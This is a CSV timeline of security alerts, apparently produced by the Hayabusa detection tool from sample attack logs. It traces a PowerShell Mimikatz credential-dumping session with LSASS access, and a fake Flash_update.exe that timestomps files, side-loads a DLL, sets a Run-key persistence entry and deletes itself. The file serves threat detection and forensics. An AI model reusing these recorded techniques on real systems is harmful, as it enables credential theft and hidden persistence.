2019-04-19 01:58:14.871 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3980 | PGUID: 365ABB72-AD19-5CB8-0000-0010F4F40C00 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:34.168 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:34.448 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:34.659 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:34.689 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:35.680 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:49.961 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\wlanapi.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1624 | PGUID: 365ABB72-AB28-5CB8-0000-001025060100 | Hash: SHA1=31E713AFCF973171D9A3B0B616F4726CD3CFE621,MD5=837E870DBDEE3D19122C833389D81CC9,SHA256=4C4410B103A80D9502E6842033BBDA2952C219824DCCA75EEB8265C94A53FBC4,IMPHASH=6C6D0BFAB9C996952B5E81BA61DB929E",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:03:03.321 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:03:03.441 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\HTools (vboxsrv) (D).lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-28 00:57:25.868 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Flash_update.exe | Process: C:\Windows\Explorer.EXE | PID: 2772 | PGUID: 365ABB72-7ACC-5CC4-0000-0010B2470300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:27.087 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 944 | PGUID: 365ABB72-7AB0-5CC4-0000-0010C5BE0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Users\IEUser\Downloads\Flash_update.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf4be | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=B4E581F173F782A2F1DA5D29C95946EE500EB2D0,MD5=42893ADBC36605EC79B5BD610759947E,SHA256=1A061C74619DE6AF8C02CBA0FA00754BDD9E3515C0E08CAD6350C7ADFC8CDD5B,IMPHASH=40BEC1A4A3BCB7D3089B5E1532386613",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.587 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.650 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.650 +09:00,IEWIN7,2,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll.url | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-05 17:50:28.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.650 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=4E14894860034FEFBAB41CFE9A763D8061D19EF9,MD5=2D8FB1F82724CF542CD2E3A5E041FB52,SHA256=ECE29E4AF4B33C02DAFAC24748A9C125B057E39455ACF3C45464DB36BFE74881,IMPHASH=9599F61759CDFD742AFA0B8EC24B5599",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1060,technique_name=Registry Run Keys / Start Folder | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Run\360v: C:\Users\IEUser\AppData\Roaming\svchost.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.931 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2992 | Src PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Tgt PID: 3076 | Tgt PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /A | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | LID: 0xf4be | PID: 3076 | PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 3188 | PGUID: 365ABB72-7C02-5CC4-0000-0010FD6E0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:54.165 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
